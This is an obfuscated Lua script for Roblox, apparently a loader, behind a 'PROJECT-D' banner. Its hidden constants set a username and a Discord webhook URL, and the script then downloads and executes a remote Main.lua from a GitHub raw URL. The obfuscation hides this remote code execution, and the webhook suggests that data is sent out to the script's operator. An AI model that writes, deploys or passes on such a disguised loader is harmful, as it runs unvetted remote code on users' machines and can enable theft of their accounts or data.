--[[
██████╗ ██████╗  ██████╗      ██╗███████╗ ██████╗████████╗   ██████╗ 
██╔══██╗██╔══██╗██╔═══██╗     ██║██╔════╝██╔════╝╚══██╔══╝   ██╔══██╗
██████╔╝██████╔╝██║   ██║     ██║█████╗  ██║        ██║█████╗██║  ██║
██╔═══╝ ██╔══██╗██║   ██║██   ██║██╔══╝  ██║        ██║╚════╝██║  ██║
██║     ██║  ██║╚██████╔╝╚█████╔╝███████╗╚██████╗   ██║      ██████╔╝
╚═╝     ╚═╝  ╚═╝ ╚═════╝  ╚════╝ ╚══════╝ ╚═════╝   ╚═╝      ╚═════╝ 
                                                                                                          
]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end if (v0==4) then v16=function(v21,v22,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (7==v27) then v39=function(v40,v41,v42)local v48=v40[1];local v49=v40[2];local v50=v40[3];return function(...)local v75=1;local v76= -1;local v77={...};local v78=v13("#",...) -1 ;local function v79()local v82=v48;local v83=v49;local v84=v50;local v85=v37;local v86={};local v87={};local v88={};for v97=0 + 0 ,v78 do if ((((12517 -6782) -(182 + 1426))>=(4111 -(138 + 537 + 83))) and (v97>=v84)) then v86[v97-v84 ]=v77[v97 + 1 + 0 ];else v88[v97]=v77[v97 + 1 + 0 ];end end local v89=(v78-v84) + (2 -1) ;local v90;local v91;while true do local v98=0 -0 ;local v99;local v100;while true do if ((v98==(4 -3)) or ((10166 -6163)==(809 -640))) then while true do if (((1949 + 2812)==(5526 -(736 + 29))) and (v99==(0 -0))) then v100=0;while true do if (((5815 -2866)>=(155 + 67)) and (((0 -0) + 0)==v100)) then local v116=0 -0 ;local v117;while true do if (((1613 + 461)<=(18326 -14538)) and (v116==(0 -0))) then v117=0 + 0 ;while true do if ((v117==(857 -(306 + 551))) or ((11541 -8136)<(427 + 553))) then local v128=0 -0 ;while true do if (((2794 -(1564 + 87 + 313))<=(2183 + 688)) and (v128==(1 + 0))) then v117=1 -0 ;break;end if ((4370>=(725 + 1090)) and (v128==(0 -0))) then v90=v82[v75];v91=v90[(920 + 28) -(936 + 11) ];v128=1 + 0 ;end end end if ((v117==(1 + 0)) or ((6591 -1937)>(3617 + 1091))) then v100=465 -(179 + 285) ;break;end end break;end end end if ((4022>203) and (v100==1)) then if ((v91<=(2 + 1)) or ((1105 + 742)==(6167 -(1477 + 173)))) then if ((v91<=(1 + 0)) or ((5396 -3342)==(5529 -(138 + 711)))) then if ((v91>((273 -(71 + 202)) -0)) or ((3468 + 217)<(6329 -3984))) then v88[v90[(655 + 1289) -(1181 + 761) ]]=v42[v90[6 -3 ]];else v88[v90[1489 -(1263 + 224) ]]=v90[3 + 0 ];end elseif ((v91==(1 + 1)) or (4773==(990 -(18 + 27)))) then v88[v90[2 + 0 ]]();else do return;end end elseif (((6924 -3754)>(1124 + 1848)) and (v91<=(436 -(6 + 425)))) then if ((v91==(2 + 2)) or ((2880 -(609 + 211))<=(186 + 159))) then local v133=0;local v134;local v135;local v136;local v137;local v138;while true do if ((v133==1) or (3898<=2965)) then v136=nil;v137=nil;v133=779 -(399 + 378) ;end if ((v133==(0 + 0 + 0)) or ((2966 -(220 + 820))==(2835 -(1556 + 82)))) then v134=0 + 0 ;v135=nil;v133=1633 -(1447 + 185) ;end if (((340 + 3755)>=(5274 -(511 + 1167))) and (((3 + 0) -1)==v133)) then v138=nil;while true do if ((((5237 -3324) -(536 + 1376))==v134) or ((702 + 1184)==(3403 -(4422 -3075)))) then v76=(v137 + v135) -(2 -1) ;v138=0 + (0 -0) ;v134=2;end if ((v134==((2722 -(732 + 704)) -(204 + (3127 -2045)))) or (((11272 -6607) + 3)<=(636 + 1389))) then local v159=1486 -(767 + 719) ;while true do if ((v159==(1643 -(1284 + 358))) or ((15629 -10828)<=((13854 -(250 + 1349)) -9261))) then v134=1 + 0 ;break;end if (((0 -0)==v159) or ((1716 -(216 + 1346))>(741 + 211))) then v135=v90[1824 -((1716 -(216 + 7)) + 329) ];v136,v137=v85(v88[v135](v14(v88,v135 + 1 ,v90[3])));v159=1;end end end if ((v134==(1 + 1)) or (2707<1386)) then for v164=v135,v76 do local v165=0;while true do if (((2050 -(745 + (1643 -1214)))>=(651 -362)) and (v165==0)) then v138=v138 + (1952 -(1398 + 553)) ;v88[v164]=v136[v138];break;end end end break;end end break;end end else local v139=0 -0 ;local v140;local v141;while true do if ((v139==(1 + 0 + 0)) or (4117>(2376 + 2083))) then while true do if ((3575<(5806 -(406 + 576))) and (v140==(0 + (0 -0)))) then v141=v90[1147 -(97 + 1048) ];v88[v141]=v88[v141](v14(v88,v141 + 1 + 0 ,v76));break;end end break;end if (((6404 -(1268 + (2200 -(110 + 1496))))<=(96 + 4797)) and (v139==(523 -(475 + (1198 -(881 + 269)))))) then v140=0 + 0 ;v141=nil;v139=1425 -(1332 + 92) ;end end end elseif ((v91>(1718 -(1663 + 49))) or (4913<=(5456 -(8013 -5435)))) then local v142=0 + 0 ;local v143;local v144;while true do if (((1505 + 619)<2583) and (v142==(63 -(39 + 23)))) then v88[v143 + 1 + 0 + 0 ]=v144;v88[v143]=v144[v90[19 -15 ]];break;end if ((v142==(0 -0)) or ((900 + 252)<(577 + 196))) then local v152=0 -0 ;while true do if (((7039 -3193)>=(11199 -7999)) and (1==v152)) then v142=1 + 0 ;break;end if ((3316==(3604 -(121 + 129 + 38))) and (v152==(1052 -((2420 -(1009 + 704)) + 345)))) then v143=v90[2];v144=v88[v90[13 -10 ]];v152=1 + 0 ;end end end end else v42[v90[2 + 1 ]]=v88[v90[(1871 -(580 + 1290)) + 1 ]];end v75=v75 + (2 -1) ;break;end end break;end end break;end if (((11627 -8841)>=((4721 -(724 + 508)) -(132 + 718))) and ((0 + 0)==v98)) then v99=0 -0 ;v100=nil;v98=360 -(109 + 250) ;end end end end A,B=v37(v12(v79));if  not A[1] then local v101=0;local v102;while true do if (v101==0) then v102=v40[4][v75] or "?" ;error("Script error at ["   .. v102   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end end;end;return v39(v38(),{},v22)(...);end if (v27==5) then v36=v33;v37=nil;v37=function(...)return {...},v13("#",...);end;v27=6;end if (v27==0) then v28=1;v29=nil;v21=v5(v4(v21,5),"..",function(v43)if (v2(v43,2)==79) then v29=v1(v4(v43,1,1));return "";else local v92=v3(v1(v43,16));if v29 then local v103=v6(v92,v29);v29=nil;return v103;else return v92;end end end);v27=1;end if (v27==6) then v38=nil;v38=function()local v51=65 -(46 + 19) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==(631 -(532 + 97))) then v56=nil;v57=nil;v51=8 -5 ;end if ((1 + 0)==v51) then v54=nil;v55=nil;v51=1 + 1 ;end if (v51~=0) then else v52=0 + 0 ;v53=nil;v51=4 -3 ;end if (v51~=(7 -4)) then else v58=nil;while true do local v104=1401 -(500 + 901) ;while true do if (v104~=(1177 -(271 + 906))) then else local v110=0 -0 ;while true do if (v110~=(0 -0)) then else if (v52~=(1106 -(957 + 147))) then else local v118=0;while true do if (v118==(2 -1)) then for v121=1,v33() do v55[v121]=v33();end return v56;end if (v118==(0 + 0)) then for v123=1,v33() do local v124=0 + 0 ;local v125;while true do if (0==v124) then v125=v31();if (v30(v125,1 -0 ,1)==0) then local v153=0;local v154;local v155;local v156;local v157;local v158;while true do if (v153==0) then v154=0 + 0 ;v155=nil;v153=1;end if (v153==1) then v156=nil;v157=nil;v153=5 -3 ;end if (v153==2) then v158=nil;while true do if (v154~=0) then else local v167=0;local v168;while true do if ((0 + 0)~=v167) then else v168=0;while true do if (1==v168) then v154=1 -0 ;break;end if (v168==(0 -0)) then local v181=0 -0 ;while true do if (v181~=(0 -0)) then else v155=0 -0 ;v156=nil;v181=1;end if (v181==(1495 -(973 + 521))) then v168=1;break;end end end end break;end end end if ((1 -0)~=v154) then else v157=nil;v158=nil;v154=2;end if (v154==(1408 -(817 + 589))) then while true do if (3==v155) then if (v30(v157,3,2 + 1 )==(1 + 0)) then v158[4]=v58[v158[4]];end v53[v123]=v158;break;end if (1~=v155) then else local v172=1863 -(1659 + 204) ;local v173;local v174;while true do if (v172==(0 + 0)) then v173=0 + 0 ;v174=nil;v172=3 -2 ;end if (v172~=1) then else while true do if (v173==0) then v174=0;while true do if (v174~=0) then else v158={v32(),v32(),nil,nil};if (v156==0) then local v188=0 + 0 ;local v189;local v190;while true do if (v188~=1) then else while true do if (v189==0) then v190=89 -(66 + 23) ;while true do if (0==v190) then v158[1 + 2 ]=v32();v158[4]=v32();break;end end break;end end break;end if (v188~=0) then else v189=0;v190=nil;v188=1;end end elseif (v156==1) then v158[908 -(503 + 402) ]=v33();elseif (v156==2) then v158[3]=v33() -((3 -1)^(413 -(300 + 97))) ;elseif (v156==(5 -2)) then local v193=275 -(236 + 39) ;local v194;local v195;while true do if (v193~=1) then else while true do if (v194~=(167 -(79 + 88))) then else v195=0 -0 ;while true do if (v195==0) then v158[1 + 2 ]=v33() -(2^(13 + 3)) ;v158[10 -6 ]=v32();break;end end break;end end break;end if (v193~=(0 + 0)) then else v194=0;v195=nil;v193=1 + 0 ;end end end v174=1 -0 ;end if ((3 -2)==v174) then v155=2;break;end end break;end end break;end end end if (v155==2) then local v175=0 + 0 ;local v176;while true do if (v175==(1039 -(627 + 412))) then v176=0;while true do if ((525 -(77 + 447))==v176) then v155=3;break;end if (v176==(113 -(22 + 91))) then if (v30(v157,1,1 + 0 )==(1 + 0)) then v158[2]=v58[v158[684 -(607 + 75) ]];end if (v30(v157,2,2)==(1 + 0)) then v158[1504 -(1303 + 198) ]=v58[v158[932 -(203 + 726) ]];end v176=1;end end break;end end end if (v155==0) then local v177=0;local v178;while true do if (v177==(899 -(560 + 339))) then v178=1313 -(1216 + 97) ;while true do if (v178==1) then v155=1;break;end if (v178==(0 -0)) then local v182=0;local v183;while true do if (v182==0) then v183=1434 -(1395 + 39) ;while true do if (v183==(0 + 0)) then v156=v30(v125,2,6 -3 );v157=v30(v125,4,2 + 4 );v183=1682 -(601 + 1080) ;end if (v183==(1 + 0)) then v178=1;break;end end break;end end end end break;end end end end break;end end break;end end end break;end end end for v126=1,v33() do v54[v126-(2 -1) ]=v38();end v118=1 + 0 ;end end end if (v52==0) then v53={};v54={};v55={};v56={v53,v54,nil,v55};v52=585 -(92 + 492) ;end v110=1;end if (v110==1) then v104=1 + 0 ;break;end end end if (v104==(1 + 0)) then if (1~=v52) then else v57=v33();v58={};for v112=1,v57 do local v113=152 -(119 + 33) ;local v114;local v115;while true do if (v113==(308 -(63 + 244))) then if (v114==1) then v115=v31()~=0 ;elseif (v114==(5 -3)) then v115=v34();elseif (v114~=(1 + 2)) then else v115=v35();end v58[v112]=v115;break;end if (v113~=(0 + 0)) then else local v120=1402 -(945 + 457) ;while true do if (v120==1) then v113=1073 -(672 + 400) ;break;end if (v120==0) then v114=v31();v115=nil;v120=1;end end end end end v56[4 -1 ]=v31();v52=2;end break;end end end break;end end end;v39=nil;v27=7;end if (v27==2) then v31=function()local v59=352 -(68 + 284) ;local v60;while true do if (v59==(50 -(25 + 7 + 18))) then v60=v2(v21,v28,v28);v28=v28 + 1 ;v59=1728 -(4 + 1723) ;end if (v59==(1 + 0)) then return v60;end end end;v32=nil;v32=function()local v61,v62=v2(v21,v28,v28 + 2 + 0 );v28=v28 + 1 + 1 ;return (v62 * (661 -405)) + v61 ;end;v27=3;end if (3==v27) then v33=nil;v33=function()local v63,v64,v65,v66=v2(v21,v28,v28 + (5 -2) );v28=v28 + 4 ;return (v66 * (77632642 -60855426)) + (v65 * (28878 + 36658)) + (v64 * 256) + v63 ;end;v34=nil;v27=4;end if (v27==1) then v30=nil;v30=function(v44,v45,v46)if v46 then local v93=(v44/((1 + (1204 -(605 + 598)))^(v45-(341 -(183 + 157)))))%((684 -(340 + (627 -285)))^(((v46-(336 -(49 + (799 -(7 + 506))))) -(v45-(852 -(178 + 504 + 169)))) + (1 -0))) ;return v93-(v93%(2 -1)) ;else local v94=0 + 0 ;local v95;while true do if ((0 -0)==v94) then v95=(5 -3)^(v45-1) ;return (((v44%(v95 + v95))>=v95) and 1) or (0 -(0 + 0)) ;end end end end;v31=nil;v27=2;end if (4==v27) then v34=function()local v67=v33();local v68=v33();local v69=2 -(3 -2) ;local v70=(v30(v68,1 -0 ,45 -25 ) * (2^(31 + 1))) + v67 ;local v71=v30(v68,200 -(102 + 77) ,(3840 -3036) -(498 + 275) );local v72=((v30(v68,32)==((6508 -4724) -(1589 + 194))) and  -(767 -(93 + 673))) or (1 -0) ;if (v71==(934 -(31 + 903))) then if (v70==(0 -0)) then return v72 * ((120 + 895) -(570 + 445)) ;else local v105=0 + 0 ;while true do if ((0 + 0)==v105) then v71=4 -3 ;v69=0 + (0 -0) ;break;end end end elseif (v71==(8 + 2039)) then return ((v70==(0 + 0)) and (v72 * ((1 + 0)/(766 -(104 + 662))))) or (v72 * NaN) ;end return v9(v72,v71-(376 + 647) ) * (v69 + (v70/((6 -4)^(250 -198)))) ;end;v35=nil;v35=function(v47)local v73;if  not v47 then local v96=0 + 0 ;while true do if (v96==(1256 -(23 + 1233))) then v47=v33();if (v47==(0 + 0)) then return "";end break;end end end v73=v4(v21,v28,(v28 + v47) -(1 + 0) );v28=v28 + v47 ;local v74={};for v80=3 -(698 -(23 + 673)) , #v73 do v74[v80]=v3(v2(v4(v73,v80,v80)));end return v7(v74);end;v27=5;end end end;v16("LOL!083O0003083O00557365724E616D6503073O006B616A6174595403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130393235322O34323732303936312O3334332F5F7369375A635A4E4A2O73746C646C4D3836586132573042654F367036425851344C69485A543857566F52347A5044757455716642457842413979712D6D69665A592O47030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F52692O7A2F6D61696E2F4D61696E2E6C7561000C3O00124O00023O0012063O00013O00124O00043O0012063O00033O0012013O00053O001201000100063O00200700010001000700122O000300084O0004000100034O00055O00022O00023O000100012O00033O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v10(),...);break;end if (v0==3) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end end end
